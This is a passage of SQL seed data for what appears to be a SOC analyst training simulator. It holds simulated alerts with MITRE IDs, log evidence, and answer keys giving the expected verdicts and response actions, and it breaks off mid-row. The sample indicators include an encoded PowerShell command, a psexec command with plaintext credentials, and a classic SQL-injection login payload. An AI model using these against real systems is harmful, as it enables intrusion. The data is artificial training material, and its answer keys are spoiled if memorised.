3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.409Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:15:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.4\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"vm-user\\\",\\\"hostname\\\":\\\"azure-vm-01\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\badfile.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(762, 'Unusual Spike in Cloud Resource Usage', 'low', 'AWS CloudWatch', 'An unusual increase in compute resources was detected in AWS, suggesting potential crypto mining activity.', 'Anomaly', 'T1496', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T10:00:00Z\",\"event_type\":\"resource_usage\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"N/A\",\"username\":\"aws-user\",\"hostname\":\"aws-ec2-instance\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-01-11 03:05:12', '2026-02-16 17:38:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the cloud instance\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"aws-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"AWS user account managing the instance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The increased resource usage is attributed to a legitimate workload spike by the user.\"}', 'Novice', 'CLOUD', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.410Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:00:00Z\\\",\\\"event_type\\\":\\\"resource_usage\\\",\\\"src_ip\\\":\\\"192.168.3.10\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"aws-user\\\",\\\"hostname\\\":\\\"aws-ec2-instance\\\",\\\"request_body\\\":\\\"N/A\\\",\\\"command_line\\\":\\\"N/A\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(763, 'Suspicious PowerShell Encoded Command Execution Detected', 'high', 'CrowdStrike', 'A PowerShell process executed with an encoded command, potentially indicating a script-based attack leveraging Living-off-the-Land techniques.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.15.23\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"WIN-4D5G6H7J8\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB2AGkAcgB1AHMAdABvAGwAPQAiAG0AYQBsAGkAYwBpAG8AdQBzACIAOwBBAHMAcwBlAHQAIABWAGkAcgB1AHMAdABvAGwA\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB2AGkAcgB1AHMAdABvAGwAPQAiAG0AYQBsAGkAYwBpAG8AdQBzACIAOwBBAHMAcwBlAHQAIABWAGkAcgB1AHMAdABvAGwA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell commands are often used in malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the organization\'s network.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell indicates an attempt to bypass detection mechanisms.\"}', 'Advanced', 'EDR', 8, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(764, 'Lateral Movement via PSExec Tool Detected', 'critical', 'Wazuh', 'Suspicious PSExec activity detected, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER1\",\"request_body\":\"\",\"command_line\":\"psexec.exe \\\\\\\\10.0.0.25 -u admin -p password cmd.exe\"}', '2026-01-11 17:29:28', '2026-02-16 18:02:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used by the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.0.25 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec is commonly used in lateral movement attacks.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage from an internal source indicates lateral movement attempts.\"}', 'Advanced', 'EDR', 8, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.412Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\10.0.0.25 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(765, 'Malicious Email with Phishing Link Detected', 'medium', 'Proofpoint', 'An email containing a known phishing link was detected and flagged for review.', 'Phishing', 'T1566.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:30:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"\",\"dst_ip\":\"\",\"username\":\"hr@company.com\",\"hostname\":\"\",\"request_body\":\"\",\"command_line\":\"\",\"email_sender\":\"support@fakebank.com\",\"url\":\"http://maliciouslink.com/login\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@fakebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email address associated with phishing activity.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciouslink.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"URL is a known phishing site.\"}}],\"expected_actions\":[\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known phishing link in the email confirms the threat.\"}', 'Advanced', 'SIEM', 8, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email with Phishing Link Detected\",\"date\":\"2026-02-01T20:32:22.413Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(766, 'SQL Injection Attack Detected on Web Application', 'critical', 'IDS/IPS', 'An attempted SQL injection attack was detected targeting the company\'s web application.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:22:45Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.5\",\"username\":\"\",\"hostname\":\"web-app\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-01-11 17:29:28', '2026-03-14 14:54:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 512 times for SQL injection attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL payload confirms an attempt to manipulate the database.\"}', 'Advanced', 'CORE', 8, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.414Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:22:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(767, 'Suspicious Network Activity from Internal IP Address', 'low', 'Firewall', 'A high volume of outbound connections detected from an internal IP, potentially indicating data exfiltration activity.', 'Data Exfiltration', 'T1048', 0, 'investigating', 183, '{\"timestamp\":\"2026-01-11T13:05:37Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.1.1.10\",\"dst_ip\":\"192.0.2.45\",\"username\":\"svc-data\",\"hostname\":\"DATA-SERVER\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 17:29:28', '2026-02-20 04:38:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the organization\'s data server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"External IP reported for suspicious data exfiltration activities.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The pattern of network activity aligns with typical data exfiltration behavior.\"}', 'Advanced', 'NDR', 8, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(768, 'False Positive - Routine Administrative Command Execution', 'low', 'Splunk', 'A routine administrative command was flagged due to its similarity to known malicious patterns.', 'False Positive', '', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:23:01Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.10.10.10\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"ADMIN-PC\",\"request_body\":\"\",\"command_line\":\"regsvr32.exe /i /n C:\\\\Windows\\\\System32\\\\sample.dll\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /i /n C:\\\\Windows\\\\System32\\\\sample.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Command is a legitimate administrative tool usage.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"false_positive\",\"analysis_notes\":\"The command is consistent with routine administrative tasks.\"}', 'Advanced', 'EDR', 8, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.416Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:23:01Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.10.10.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ADMIN-PC\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"regsvr32.exe /i /n C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sample.dll\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(769, 'False Positive - Misconfigured Security Tool Trigger', 'medium', 'IDS/IPS', 'An internal misconfiguration caused a legitimate traffic flow to be flagged as suspicious.', 'False Positive', '', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:45:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.30\",\"username\":\"svc-network\",\"hostname\":\"NET-SERVER\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 17:29:28', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the organization\'s network.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"false_positive\",\"analysis_notes\":\"The network connection is between two internal IPs and is expected behavior.\"}', 'Advanced', 'NDR', 8, 1, 'OT_ICS', NULL, NULL, 